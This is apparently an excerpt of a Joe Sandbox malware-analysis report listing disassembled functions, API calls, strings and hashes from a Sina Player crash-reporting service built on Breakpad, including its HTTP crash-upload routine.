                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??3@?sputc@?$basic_streambuf@Location@tracked_objects@@TimeU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Base@internal@base@@CallbackCallback@$$CountCounter@tracked_objects@@CurrentD@std@@@1@@DebugDelayedDelta@2@@Delta@base@@FromLoop@base@@MessageOsfx@?$basic_ostream@OutputPostProgramSeconds@StringTask@ThreadTickV01@@V01@_V12@_Z@2@
                                                                                                                                                                                                    • String ID: thread_ptr = $)#sinaclient#[$)- $StatComplete stat_suc = $UploadMgr::StatComplete$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3876395713-1710819069
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 003989A1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,?), ref: 003989F6
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 00398A10
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398A53
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398A7F
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,backup_ver,0000000A), ref: 00398AB6
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398AC9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398AFA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398B26
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,cur_ver,00000007), ref: 00398B5D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398B70
                                                                                                                                                                                                    • ??0JSONStringValueSerializer@@QAE@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 00398B82
                                                                                                                                                                                                    • ?Serialize@JSONStringValueSerializer@@UAE_NABVValue@base@@@Z.BASE(00000000), ref: 00398B9A
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 00398BAA
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00398BB5
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398BD0
                                                                                                                                                                                                    • ?DirName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 00398BE0
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00398BEB
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398BFB
                                                                                                                                                                                                    • ?WriteFile@base@@YAHABVFilePath@1@PBDH@Z.BASE(?,00000000,00000000), ref: 00398C13
                                                                                                                                                                                                    • ??1JSONStringValueSerializer@@UAE@XZ.BASE ref: 00398C38
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C57
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C7A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398C9D
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00398CC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$V12@$D@std@@DictionarySerializer@@StringU?$char_traits@V?$allocator@V?$basic_string@ValueValue@base@@$Append@D@2@@std@@0@Name@PathPath@1@@String@U?$char_traits@_V01@V01@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$??2@CreateD@2@@std@@@DirectoryExists@base@@File@base@@Get@Path@1@Path@base@@@Serialize@Service@@Value@base@@@W@base@@Write
                                                                                                                                                                                                    • String ID: backup_ver$cur_ver
                                                                                                                                                                                                    • API String ID: 415853976-3805504336
                                                                                                                                                                                                    • Opcode ID: dd17871e8501d22be52a110615eff4bd0da0d20fddfe4d05e10f70918d778d08
                                                                                                                                                                                                    • Instruction ID: a29166d2c21fc44d51c2e5b0a8016a0ab82cfe4ef5f3b5efe026c4e9e9976526
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd17871e8501d22be52a110615eff4bd0da0d20fddfe4d05e10f70918d778d08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB16EB1C00248DFEF12DBA4C8497DEBFB4AF16314F1841A9D40AB7291DB765A89CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0038C996
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038C9B9
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C9F3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038CA2E
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038CA4E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(00000000), ref: 0038CA6B
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CA8E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038CA9F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038CAB9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038CAC1
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038CADF
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038CAEE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB3F
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB4B
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038CB57
                                                                                                                                                                                                      • Part of subcall function 00375EC0: InterlockedCompareExchange.KERNEL32(003AC118,00000001,00000000), ref: 00375EFB
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ??2@YAPAXI@Z.MSVCR120(00000134,?,?,?,003993DB,000000FF), ref: 00375F0A
                                                                                                                                                                                                      • Part of subcall function 00375EC0: ?RegisterCallback@AtExitManager@base@@SAXP6AXPAX@Z0@Z.BASE(00375EA0,00000000), ref: 00375F45
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??2@YAPAXI@Z.MSVCR120(00000014), ref: 003766EF
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE(6C6C56E0,00000000), ref: 0037670A
                                                                                                                                                                                                      • Part of subcall function 003766C0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000,6C6C56E0,00000000), ref: 0037673D
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000), ref: 0038CB96
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(breakpad::CrashService::OnClientUploadRequest,breakpad\tools\crash_service.cc,00000229,00000000), ref: 0038CBB2
                                                                                                                                                                                                      • Part of subcall function 0037A100: ?PostTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@@Z.BASE(?,?), ref: 0037A11C
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0038CC88
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??2@?sputc@?$basic_streambuf@Base@internal@base@@CallbackLocation@tracked_objects@@ThreadU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Base@12@@Base@subtle@base@@BindCallback@Callback@$$CompareCountCountedCounter@tracked_objects@@CurrentD@std@@@1@@DebugExchangeExitInterlockedLoop@base@@Manager@base@@MessageOsfx@?$basic_ostream@OutputPostProgramRegisterSafeStateStringTask@TickV01@@Z@2@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $OnClientUploadRequest crash_id = $breakpad::CrashService::OnClientUploadRequest$breakpad\tools\crash_service.cc
                                                                                                                                                                                                    • API String ID: 2188131305-3161232688
                                                                                                                                                                                                    • Opcode ID: 52952071f184128ebb201305c04e3e9e2600740e01cbc529e728f61327582b33
                                                                                                                                                                                                    • Instruction ID: c2bc914627aa0a6f25541b730ad57ef67a17cdd89c5558076638cf7cb71b1913
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52952071f184128ebb201305c04e3e9e2600740e01cbc529e728f61327582b33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 509162B1900208EFDF12EFA4ED4AFDEB7B8EB15304F0045A6E519A7291EB755A04CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(003AC14C), ref: 0038B7C2
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038B806
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038B83C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038B879
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038B899
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B8B6
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038B8D9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B8EA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038B904
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038B90C
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038B92A
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038B939
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B987
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B993
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038B99C
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038B9A9
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000137,000000FF), ref: 0038B9C9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000005), ref: 0038B9F4
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038BA0C
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0038BA16
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(003AC14C), ref: 0038BA21
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Interlocked$?sputc@?$basic_streambuf@IncrementMessage@logging@@U?$char_traits@_W@std@@@std@@$??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugDecrementHelper@logging@@LevelOsfx@?$basic_ostream@OutputStringThreadTickV01@@Vlog
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $breakpad\tools\crash_service.cc$client start. pid = $Vll
                                                                                                                                                                                                    • API String ID: 3593502776-2176258545
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 00391B80
                                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,?,00000000,?), ref: 00391BE7
                                                                                                                                                                                                    • InternetOpenW.WININET(Breakpad/1.0 (Windows),00000000,00000000,00000000,00000000), ref: 00391C84
                                                                                                                                                                                                    • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00391CBC
                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 00391D04
                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,20000000), ref: 00391D70
                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 00391DD5
                                                                                                                                                                                                    • __iob_func.MSVCR120 ref: 00391DE4
                                                                                                                                                                                                    • fwprintf.MSVCR120 ref: 00391DEE
                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 00391E03
                                                                                                                                                                                                    • __iob_func.MSVCR120 ref: 00391E12
                                                                                                                                                                                                    • fwprintf.MSVCR120 ref: 00391E1C
                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391E45
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000013,00000005,?,00000000), ref: 00391E69
                                                                                                                                                                                                    • wcstol.MSVCR120 ref: 00391E7B
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EE3
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EE6
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391EEF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Internet$Http$CloseHandleRequest$OpenOption__iob_funcfwprintf$ConnectCrackHeadersInfoQuerySendmemsetwcstol
                                                                                                                                                                                                    • String ID: <$Breakpad/1.0 (Windows)$Could not unset receive timeout, continuing...$Could not unset send timeout, continuing...$POST$http$https
                                                                                                                                                                                                    • API String ID: 3029656879-3705295068
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C580FF0
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(?,00007FFF,?,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C580FFA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000002), ref: 6C581021
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?), ref: 6C581038
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C58108E
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5810AD
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001), ref: 6C5810BD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5810DC
                                                                                                                                                                                                    • strlen.MSVCR120(?), ref: 6C5810ED
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 6C58110B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C581133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,?,?,00000000,?,?), ref: 6C581056
                                                                                                                                                                                                      • Part of subcall function 6C561693: _errno.MSVCR120(?,?,6C5CBEB4,6C633568,00000314,Runtime Error!Program: ,?,?,?), ref: 6C5616D5
                                                                                                                                                                                                      • Part of subcall function 6C561693: _invalid_parameter_noinfo.MSVCR120(?,?,6C5CBEB4,6C633568,00000314,Runtime Error!Program: ,?,?,?), ref: 6C5A634D
                                                                                                                                                                                                      • Part of subcall function 6C58120C: wcschr.MSVCR120(?,0000003D,00000000,?,00ED4C78), ref: 6C581232
                                                                                                                                                                                                      • Part of subcall function 6C58120C: free.MSVCR120(?,00000000,?,00ED4C78), ref: 6C581296
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD29
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD34
                                                                                                                                                                                                    • wcschr.MSVCR120(?,0000003D,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD46
                                                                                                                                                                                                    • _wcsnlen.LIBCMT(-00000002,00007FFF,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD6A
